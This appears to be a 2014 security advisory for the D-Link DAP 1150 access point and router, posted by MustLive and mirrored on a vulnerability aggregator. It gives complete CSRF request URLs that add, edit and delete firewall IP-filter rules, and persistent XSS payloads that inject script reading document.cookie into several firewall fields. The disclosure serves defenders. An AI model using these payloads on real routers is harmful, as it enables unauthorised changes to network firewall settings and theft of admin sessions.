D-Link DAP 1150 Cross Site Request Forgery / Cross Site Scripting

🗓️ 11 Apr 2014 00:00:00Reported by MustLiveType

packetstorm🔗 packetstormsecurity.com👁 51 Views

D-Link DAP 1150 multiple Cross Site Request Forgery and Cross Site Scripting vulnerabilitie

`Hello list!  
  
In 2011 and beginning of 2012 I wrote about multiple vulnerabilities  
(http://securityvulns.ru/docs27440.html,  
http://securityvulns.ru/docs27677.html,  
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens).  
That time I wrote about vulnerabilities in admin panel in Access Point mode  
and now I'll write about holes in Router mode.  
  
I present new vulnerabilities in this device. There are multiple Cross-Site  
Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150  
(Wi-Fi Access Point and Router).  
  
SecurityVulns ID: 12076.  
  
CSRF (WASC-09):  
  
In section Firewall / IP-filters via CSRF it's possible to add, edit and  
delete settings of IP-filters.  
  
Add:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=-1  
  
Edit:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22IP%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0  
  
Delete:  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_struct_size=0&res_config_id=88&res_pos=0  
  
XSS (WASC-08):  
  
These are persistent XSS. The code will execute in section Firewall /  
IP-filters.  
  
Attack via add function in parameter res_buf (in fields: Name, IP Addresses  
Source, Destination, Ports Source, Destination).  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22portd%22:%2280%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ipd%22:%22192.168.1.2/32%3Cscript%3Ealert(document.cookie)%3C/script%3E%22}&res_pos=-1  
  
Attack via edit function in parameter res_buf (in field Name, but not in  
other fields).  
  
http://192.168.0.50/index.cgi?v2=y&rq=y&res_config_action=3&res_json=y&res_data_type=json&res_struct_size=0&res_config_id=88&res_buf={%22name%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22ports%22:%2280%22,%20%22portd%22:%2280%22,%20%22proto%22:0,%20%22action%22:0,%20%22ips%22:%22192.168.1.1/32%22,%20%22ipd%22:%22192.168.1.2/32%22}&res_pos=0  
  
Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This  
model with other firmware versions also must be vulnerable. D-Link ignored  
all vulnerabilities in this device (as in other devices, which I informed  
them about) and still didn't fix them.  
  
I mentioned about these vulnerabilities at my site  
(http://websecurity.com.ua/7095/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`

11 Apr 2014 00:00Current

0.3Low risk

Vulners AI Score0.3